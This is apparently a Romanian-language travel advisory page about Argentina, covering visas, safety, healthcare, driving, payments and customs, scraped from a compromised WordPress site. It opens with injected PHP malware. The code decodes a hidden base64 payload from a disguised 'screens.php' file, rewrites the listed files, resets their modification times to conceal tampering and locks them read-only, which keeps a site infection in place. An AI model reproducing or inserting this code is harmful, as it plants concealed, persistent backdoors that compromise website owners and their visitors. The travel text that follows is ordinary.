$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Argentina – O noua atitudine

Condiţii de intrare şi regimul de vize

În Republica Argentina nu aveţi nevoie de viză pentru scurtă şedere pentru o perioada de maxim 90 de zile in scop turistic.
Perioada de şedere nu trebuie să depăşească 90 de zile într-un interval de şase luni de la data primei intrări.
Scopuri pentru care sunt acordate vize: afaceri, rezidenţă temporară, muncă şi studii.

Atenţie! Constituie infracţiuni trecerea ilegală a frontierei şi depăşirea perioadei de şedere aprobată de autorităţile argentiniene.

Nu se emit vize la frontieră decât în cazuri de forţă majoră.

Autorităţi argentiniene competente pentru eliberarea vizelor şi a permiselor de şedere sunt:

  • oficiile consulare ale Republicii Argentina din exterior (pentru vize)
  • Direcţia Naţională pentru Migraţiune (pentru prelungirea vizelor şi eliberarea permiselor de şedere).

Cetăţenii români pot obţine vize de intrare în Argentina de la secţia consulară a Ambasadei Republicii Argentina în România.

Vize de rezidenţă

Dacă sunteţi căsătorit cu un cetăţean argentinian puteţi obţine vize de rezidenţă în baza actelor de registru civil corespunzătoare.

Dacă doriţi să munciţi în Argentina puteţi obţine o viză de rezidenţă temporară demonstrând că există un precontract de muncă cu o întreprindere argentiniană, care se află la zi cu plăţile faţă de fiscul argentinian şi care trebuie să aducă argumente de unde să rezulte necesitatea angajării unui cetăţean străin.

Atenţie! După intrarea în Argentina, cetăţenii români posesori de vize de rezidenţă temporară trebuie să-şi prelungească viza de şedere şi să obţină permisul de rezidenţă eliberat de autorităţile argentiniene.

În momentul în care primiţi rezidenţă temporară în Argentina, beneficiaţi iniţial de un permis de şedere valabil un an care poate fi prelungit sau transformat într-un permis de rezidenţă permanentă.

Ministerul Afacerilor Externe recomandă cetăţenilor români care intenţionează să rămână pentru o perioadă îndelungată pe teritoriul acestui stat să se adreseze misiunii diplomatice a României şi să îşi anunţe prezenţa în regiune, comunicând coordonatele personale pentru a putea fi contactaţi în situaţii de urgenţă.

Siguranţă şi criminalitate 

Infracţiunile stradale, în principal în Buenos Aires şi în principalele oraşe argentiniene, reprezintă o problemă de luat in calcul, atât pentru cetăţenii argentinieni cât şi pentru turiştii străini.
În ultimii ani în Argentina nu au fost semnalate activităţi teroriste.
Vă recomandăm să nu purtaţi bijuterii, telefoane mobile sau dispozitive performante la vedere, să păstraţi documentele de identitate în seiful hotelului, să vă supravegheaţi în permanenţă bagajele şi să evitaţi cartierele mărginaşe şi manifestaţiile.

În cazul în care sunteţi victima unei infracţiuni, trebuie să contactaţi imediat poliţia locală.
Numere de telefon utile în caz de urgenţă: Poliţia, Pompierii şi Salvarea pot fi apelaţi la numărul local 911.

În cazul pierderii paşaportului sau a altor documente, este necesară contactarea poliţiei argentiniene şi a secţiei consulare a ambasadei României la Buenos Aires.

Ambasada României la Buenos Aires poate asista cetăţenii români care au fost victima unei tâlhării sau accident în întocmirea documentelor necesare reîntoarcerii în România, contactarea familiei şi asigurarea asistenţei consulare corespunzătoare.

În caz de deces, este necesară contactarea poliţiei locale precum şi a Ambasadei.

Sistemul medical 

În Argentina reţeaua medicală este de bună calitate.
Înainte de plecarea în Argentina, vă recomandăm să încheiaţi o asigurare medicală de călătorie.
Vă recomandăm totodată ca poliţa de asigurare să includă acoperirea costurilor medicale în caz de îmbolnăvire sau accident, precum şi costul repatrierii în caz de deces.
Vă recomandăm ca înainte de plecare să vă informaţi care sunt unităţile medicale din Argentina care recunosc poliţa de asigurare respectivă.
Nu există vaccinări obligatorii, dar trebuie să ţineţi cont că s-au înregistrat cazuri de febra Dengue. Protejaţi-vă împotriva muşcăturilor de ţânţari!

Atenţie! În sezonul cald (decembrie-martie), predominant în zona de nord a ţării se înregistrează cazuri de contaminare a populaţiei cu febra Dengue. În această perioadă a anului, în zona de nord a ţării, apariţia bolii este un lucru comun, din cauza condiţiilor climatice favorizante.

Guvernul argentinian a început o campanie de combatere a bolii pentru a răspunde adecvat dimensiunii reale a fenomenului.


Condiţii privind traficul auto  

  • Circulaţia auto

Circulaţia se desfăşoară pe partea dreapta a drumului.
Circulaţia este dificilă, nu se semnalizează decât într-o proporţie foarte mică. În oraşe nu se respecta benzile de mers si nici prioritatea de dreapta.
Încălcarea regulilor de circulaţie constituie contravenţie şi se pedepseşte cu amendă.  

Atenţie! În afara localităţii, conducătorii auto trebuie să folosească obligatoriu faza scurtă, iar prioritatea de dreapta nu se aplică întotdeauna.

  • Starea drumurilor

Starea drumurilor şi a infrastructurii rutiere este în general bună, dar există şi drumuri în zonele izolate (Patagonia, Puna etc) care prezintă un grad ridicat de uzură.

  • Limite de viteză

În funcţie de categoria şoselei, limitele de viteză pot fi de 130 km/h, 110 km/h, 90 km/h, 80 km/h, 50 km/h etc. Indicatoarele de viteză sunt vizibile şi uşor de urmărit.

  • Centura de siguranţă

Folosirea centurii de siguranţă este obligatorie.

  • Parcarea

Se recomandă parcarea autovehiculelor doar în locurile special amenajate.

  • Transportul public

Argentina dispune de o reţea dezvoltată de transport public, urban şi interurban, subteran, rutier, aerian, feroviar, fluvial şi maritim.

Dacă doriţi să călătoriţi cu taxiul, vă recomandăm să apelaţi la firmele de profil.

  • Permisul de conducere

În Argentina, permisul de conducere românesc este recunoscut de poliţia locală.

Este posibil ca în zonele izolate ale Argentinei, poliţia rutieră să nu fie familiarizată cu permisul de conducere românesc, ceea ce poate determina o verificare mai detaliată a documentelor de călătorie.

  • Informaţii pentru cazuri de accident

În cazul producerii unui accident grav de circulaţie trebuie să se apeleze la serviciul de urgenţă local 911 (poliţie, salvare, pompieri).

În cazul producerii unui accident fără victime vă recomandăm contactarea celei mai apropiate secţii de poliţie locală precum şi întocmirea unui raport constatator.

Utilizarea cărţilor de credit 

În marea majoritate a magazinelor argentiniene se pot efectua plăţi cu cărţi de credit sau de debit recunoscute pe plan internaţional precum şi cu cecuri de călător.

Operaţiunile în numerar se pot face de regula în monedă naţională (peso) sau in mod excepţional in USD. Vizitaţi pagina Băncii Naţionale a Argentinei pentru a afla cursul de schimb: http://www.bna.com.ar

Reglementări vamale 

Se interzice introducerea pe teritoriul Argentinei:

  • mai mult de 10.000 USD în numerar
  • fructe şi legume proaspete

Nu există restricţii privind introducerea în Argentina a medicamentelor necesare uzului personal.

By o9admin